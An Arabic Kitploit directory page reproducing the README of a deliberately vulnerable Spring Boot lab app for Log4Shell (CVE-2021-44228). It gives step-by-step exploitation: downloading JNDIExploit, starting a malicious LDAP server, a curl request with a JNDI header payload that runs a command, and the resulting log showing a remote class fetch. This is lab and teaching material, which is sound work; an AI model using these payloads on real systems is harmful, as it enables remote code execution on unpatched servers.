Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
log4shell-vulnerable-app — تطبيق ويب Spring Boot معرّض لثغرة Log4Shell (CVE-2021-44228). | Kitploit
أدوات/GitHubGitHub/christophetd/log4shell-vulnerable-app
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubchristophetd/log4shell-vulnerable-app

log4shell-vulnerable-app

تطبيق ويب Spring Boot معرّض لثغرة Log4Shell (CVE-2021-44228).

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
1.1k55245منذ 3 سنواتتمت المراجعة من قبل Kitploit
مشاركة

تطبيق نموذجي قابل للاستغلال Log4Shell (CVE-2021-44228)

يحتوي هذا المستودع على تطبيق ويب Spring Boot قابل للاستغلال عبر ثغرة CVE-2021-44228، والتي تُعرف باسم Log4Shell.

يستخدم إصدار Log4j 2.14.1 (عبر spring-boot-starter-log4j2 2.6.1) وإصدار JDK 1.8.0_181.

تشغيل التطبيق

قم بتشغيله:

root@kitploit:~
docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app@sha256:6f88430688108e512f7405ac3c73d47f5c370780b94182854ea2cddc6bd59929

خطوات الاستغلال

ملاحظة: هذا مستوحى بشكل كبير من تحذير LunaSec الأصلي. قم بالتشغيل على مسؤوليتك الخاصة، ويفضل داخل جهاز افتراضي في بيئة معزولة.

تحديث (13 ديسمبر): تمت إزالة مستودع JNDIExploit من GitHub (على الأرجح، ليس بواسطة GitHub)... لتنزيل النسخة المخزنة في Wayback Machine.

اضغط هنا
  • استخدم JNDIExploit لإعداد خادم LDAP خبيث
root@kitploit:~
wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888
  • ثم قم بتشغيل الاستغلال باستخدام:
root@kitploit:~
# will execute 'touch /tmp/pwned'
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
  • لاحظ مخرجات JNDIExploit، فهي تُظهر أنه أرسل استجابة LDAP خبيثة وقدّم الحمولة في المرحلة الثانية:
root@kitploit:~
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8888...
[+] Received LDAP Query: Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo
[+] Paylaod: command
[+] Command: touch /tmp/pwned

[+] Sending LDAP ResourceRef result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo redirecting to http://192.168.1.143:8888/Exploitjkk87OnvOH.class
[+] New HTTP Request From /192.168.1.143:50119  /Exploitjkk87OnvOH.class
[+] Receive ClassRequest: Exploitjkk87OnvOH.class
[+] Response Code: 200
  • لتأكيد نجاح تنفيذ الأوامر، لاحظ أنه تم إنشاء الملف /tmp/pwned.txt داخل الحاوية التي تشغّل التطبيق القابل للاستغلال:
root@kitploit:~
$ docker exec vulnerable-app ls /tmp
...
pwned
...

المراجع

https://www.lunasec.io/docs/blog/log4j-zero-day/ https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/

المساهمون

@christophetd @rayhan0x01

تنزيل الأداة